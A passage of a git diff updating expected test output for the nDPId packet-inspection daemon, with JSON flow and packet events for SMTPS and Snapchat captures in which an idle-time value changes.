+00923{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1614938504972,"flow_last_seen":1614938505439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1614938505439,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"smtps.pcapng","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-data-len":696,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1614938505439} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 diff --git a/test/results/snapchat.pcap.out b/test/results/snapchat.pcap.out index 550be5ab6..b1a69bf9d 100644 --- a/test/results/snapchat.pcap.out +++ b/test/results/snapchat.pcap.out @@ -1,26 +1,26 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"snapchat.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"snapchat.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1431417993318} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431417993318,"flow_last_seen":1431417993318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431417993318,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431417993318,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431417993318,"pkt":"ABoRAAACABoRAAABCABFAAA8f1tAAEAG3k0KCAABSn2IjYHRAbtgYhiTAAAAAKAC\/\/8GegAAAgQFtAQCCAoAKmfIAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1431417993319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431417993319,"pkt":"ABoRAAACABoRAAABCABFAAAoAalAABAGjBRKfYiNCggAAQG7gdGfnedsYGIYlFAS\/\/9PMgAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431417993322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431417993322,"pkt":"ABoRAAACABoRAAABCABFAAAof1xAAEAG3mAKCAABSn2IjYHRAbtgYhiUn53nbVAQ\/\/9PMwAA"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431417993318,"flow_last_seen":1431417993373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1431417993373,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01113{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431417993318,"flow_last_seen":1431417993476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1431417993476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431418008131,"flow_last_seen":1431418008131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431418008131,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1431418008131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431418008131,"pkt":"ABoRAAACABoRAAABCABFAAA8OQ1AAEAGJJwKCAABSn2Ija34AbvuolTmAAAAAKAC\/\/8JnAAAAgQFtAQCCAoAKm3rAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431418008132,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008132,"pkt":"ABoRAAACABoRAAABCABFAAAoAeJAABAGi9tKfYiNCggAAQG7rfgRXasZ7qJU51AS\/\/8jCwAA"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431418008133,"flow_last_seen":1431418008133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431418008133,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1431418008133,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431418008133,"pkt":"ABoRAAACABoRAAABCABFAAA8wNFAAEAGnNcKCAABSn2IjduBAbsrgq06AAAAAKAC\/\/9G3wAAAgQFtAQCCAoAKm3rAAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431418008135,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008135,"pkt":"ABoRAAACABoRAAABCABFAAAoAeRAABAGi9lKfYiNCggAAQG724HUfVLFK4KtO1AS\/\/\/1gQAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1431418008135,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008135,"pkt":"ABoRAAACABoRAAABCABFAAAoOQ5AAEAGJK8KCAABSn2Ija34AbvuolTnEV2rGlAQ\/\/8jDAAA"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1431418008136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008136,"pkt":"ABoRAAACABoRAAABCABFAAAowNJAAEAGnOoKCAABSn2IjduBAbsrgq071H1SxlAQ\/\/\/1ggAA"} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008131,"flow_last_seen":1431418008138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008138,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008133,"flow_last_seen":1431418008141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008141,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008131,"flow_last_seen":1431418008294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008133,"flow_last_seen":1431418008294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431417993318,"flow_last_seen":1431417995589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1671,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431418008133,"flow_last_seen":1431418008853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1069,"flow_tot_l4_payload_len":3005,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431418008131,"flow_last_seen":1431418008701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2439,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431417993318,"flow_last_seen":1431417993318,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431417993318,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431417993318,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431417993318,"pkt":"ABoRAAACABoRAAABCABFAAA8f1tAAEAG3k0KCAABSn2IjYHRAbtgYhiTAAAAAKAC\/\/8GegAAAgQFtAQCCAoAKmfIAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1431417993319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431417993319,"pkt":"ABoRAAACABoRAAABCABFAAAoAalAABAGjBRKfYiNCggAAQG7gdGfnedsYGIYlFAS\/\/9PMgAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431417993322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431417993322,"pkt":"ABoRAAACABoRAAABCABFAAAof1xAAEAG3mAKCAABSn2IjYHRAbtgYhiUn53nbVAQ\/\/9PMwAA"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431417993318,"flow_last_seen":1431417993373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1431417993373,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01113{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431417993318,"flow_last_seen":1431417993476,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1431417993476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431418008131,"flow_last_seen":1431418008131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431418008131,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1431418008131,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431418008131,"pkt":"ABoRAAACABoRAAABCABFAAA8OQ1AAEAGJJwKCAABSn2Ija34AbvuolTmAAAAAKAC\/\/8JnAAAAgQFtAQCCAoAKm3rAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431418008132,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008132,"pkt":"ABoRAAACABoRAAABCABFAAAoAeJAABAGi9tKfYiNCggAAQG7rfgRXasZ7qJU51AS\/\/8jCwAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431418008133,"flow_last_seen":1431418008133,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431418008133,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1431418008133,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431418008133,"pkt":"ABoRAAACABoRAAABCABFAAA8wNFAAEAGnNcKCAABSn2IjduBAbsrgq06AAAAAKAC\/\/9G3wAAAgQFtAQCCAoAKm3rAAAAAAEDAwY="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431418008135,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008135,"pkt":"ABoRAAACABoRAAABCABFAAAoAeRAABAGi9lKfYiNCggAAQG724HUfVLFK4KtO1AS\/\/\/1gQAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1431418008135,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008135,"pkt":"ABoRAAACABoRAAABCABFAAAoOQ5AAEAGJK8KCAABSn2Ija34AbvuolTnEV2rGlAQ\/\/8jDAAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1431418008136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008136,"pkt":"ABoRAAACABoRAAABCABFAAAowNJAAEAGnOoKCAABSn2IjduBAbsrgq071H1SxlAQ\/\/\/1ggAA"} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008131,"flow_last_seen":1431418008138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008138,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008133,"flow_last_seen":1431418008141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008141,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 